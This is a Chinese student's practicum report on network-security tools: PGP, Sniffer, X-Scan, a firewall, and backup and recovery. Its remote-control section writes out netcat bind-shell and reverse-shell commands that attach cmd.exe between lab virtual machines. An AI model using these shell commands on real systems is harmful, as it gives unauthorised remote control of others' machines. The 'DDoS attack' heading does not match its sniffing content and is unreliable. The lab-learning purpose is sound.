《网络安全技术项目实训》实习报告

《网络安全技术项目实训》

实习报告

一、实训要求

序号实训任务

1 PGP软件的应用

2 扫描的原理以及扫描工具的使用

3 防火墙的安装和应用

4 数据的备份和恢复GHOST

5 远程控制的原理以及远程控制软件的使用（木马）

二、实训环境

硬件：CPU：Intel E7500 内存：4GB 硬盘：SATA-500GB 显示器：17寸LED 显卡：9500GT U盘：自备软件：WindowsXP、Office2003、PGP、GHOST、远程控制软件

三、实训内容

1. 数据加密软件的使用

（1）PGP软件的功能包括数字签名、消息认证、消息加密、数据压缩、邮件兼容和数据分段。安装时先安装英文版，再安装中文版，重启后使用，可以进行密钥管理、剪贴板信息加解密、当前窗口信息加解密、文件加解密和对磁盘的加密。

（2）加密文件。在桌面新建一个文本文档，右击选择“PGP”中的“加密”，该文档就生成加密后的文件，直接打开后是一些乱码。

（3）导出密钥。打开PGPKeys，在菜单栏中选择“密钥”→“导出”，设置保存位置，即可导出自己的公钥和密钥。

2.DDOS攻击

（1）Sniffer可以监视网络状态、数据流动情况以及网络上传输的信息。先安装英文版再安装中文版，重启后可使用。

（2）打开界面开始捕获数据包，它会以不同形式说明捕获到的信息。

捕获完之后，选择“解码”选项，可看到主机通过协议发送或接受到的信息。

选择“矩阵”选项，可看到主机各协议下的数据连接情况，线越粗代表数据传输越紧密。

选择“主机列表”，可看到主机各协议下发送和接受的数据包情况。

选择“protocol dist.”可查看主机不同协议的分布情况。

（3）X-Scan-v3.3-cn属于漏洞扫描工具，它首先探测存活主机，进行端口扫描，通过对探测相应数据包的分析判断是否存在漏洞。

（4）打开软件，在“设置”中设置参数，开始扫描。

扫描完成后显示检测结果，发现1个漏洞并提出一些警告和提示，并进行分析和提出解决方案。

3、防火墙的安装和应用

（1）在天网防火墙设置向导中，设置IP地址，在应用程序设置中选择允许防火墙访问的程序。完成后进行补丁。

（2）打开天网防火墙，在主界面中可根据需要设置安全级别，可查看和修改权限和IP规则。

（3）在应用程序访问网络权限设置中可看到允许防火墙访问的程序，可对其进行增加和删除，针对某一程序单击“选项”进行设置。

（4）在自定义IP规则中，查看事件及其响应动作。选中某个规则可以修改其设置，查看和阻止别人发出的攻击或扫描。

（5）打开浏览器访问ftp://10.10.0.10，防火墙出现警告信息。

4、数据的备份和恢复

（1）打开GHOST，选择磁盘到磁盘的备份，保存位置完成备份。

（2）利用Easyrecovery软件恢复通过回收站删除的文件。在E盘新建一个文本文档将其删除至回收站，打开Easyrecovery软件选择“数据恢复”中的“删除恢复”。

（3）选择一个要恢复删除文件的分区，设置文件过滤器，选择要恢复的文件及其存储位置进行恢复。

5、远程控制

（1）打开两台虚拟机，用ping命令实现相互之间的连接，通过nc实现远程控制中

伪装蜜罐、主动连接和反弹的功能。

（2）伪装蜜罐。在A机上输入nc.exe –l –p 8000，在B机上输入telnet 192.168.0.20 8000，B机可控制A机。在A机上依次输入字符就能在B机上显示出来。

（3）主动连接。在A机上输入nc.exe –l –p 9000 -t –e c:\windows\system32\cmd.exe，在B机上输入telnet 192.168.0.20 9000，B机可控制A机。在A机的E盘新建一个文本文档，通过B机可查看A机E盘中的文档属性。

（4）反弹。在A机上输入nc.exe –l –p 10000，在B机上输入nc.exe -t –e c:\windows\system32\cmd.exe 192.168.0.20 10000，A机可控制B机。在B机E盘新建一个文本文档，通过A机可查看B机E盘文档的属性。

四、实习总结

经过本次实习，我学会了一些常用信息安全软件的操作，更加熟悉了防火墙以及远程控制软件的应用，同时也掌握了一些扫描软件和攻击软件的应用。掌握了使用PGP软件对文件进行加密与解密操作；两种扫描工具的使用（X-Scan-v3.3-cn软件与sniffer 软件）；防火墙（天网防火墙）的安装于使用；数据备份与恢复软件的使用（一键GHOST 软件与Easyrecovery恢复软件）；远程控制软件的使用。

通过对这些软件的学习，我更加明白信息安全对整个网络的重要性，同时，我也掌握了一些防御功能，能有效的防御攻击，虽然在整个学习过程中，我遇到了一些问题，但是经过同学和老师的帮助，我完成了这次实训任务。

在这次实训中有了很大的收获。不仅了解到许多网络相关的知识，还掌握了许多网络安全的保护知识与设置操作，是自己在计算机上又有了更新的掌握和认识。